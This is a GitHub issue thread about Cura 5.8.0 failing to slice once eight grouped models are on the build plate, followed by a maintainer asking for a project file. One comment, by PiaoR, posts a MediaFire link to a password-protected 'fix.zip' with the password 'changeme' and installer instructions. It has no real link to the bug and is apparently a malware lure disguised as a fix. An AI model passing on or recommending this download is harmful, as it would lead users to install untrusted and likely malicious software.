### ISSUE TITLE
Grouped Object Slicing Failed

### ISSUE THREAD

**Issue by Fisco-G** [Ultimaker/Cura#19592]
### Cura Version

5.8.0

### Operating System

Windows 11 Pro

### Printer

Ender 3 Neo

### Reproduction steps

1. Imported 2 STL models (a pair to print)
2. Grouped them
3. Multiplied the selected models by 3 (I need 4 pairs)
4. Arranged all in a grid
5. Sliced
6. Error Message

1. Tried again by ungrouping
2. Same error message

This keeps happening when I have 8 models. If I delete just 1 (7 total) it slices. I've tried deleting and multiplying one at a time and it still won't work when I try 8 models.

### Actual results

I get an error message and the option to report a bug

### Expected results

The models should be sliced

### Add your .zip and screenshots here ⬇️

![image](https://github.com/user-attachments/assets/e89a581c-4aa6-4474-aaab-2f7dcf8b2387)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GregValiant** [comment]
Thanks for the report.
I can't reproduce this on my own.  Without a project file there isn't anything else that can be done.
Did you check the models for errors?
![image](https://github.com/user-attachments/assets/ed726732-aa0f-4eec-9987-c1757102cc3a)
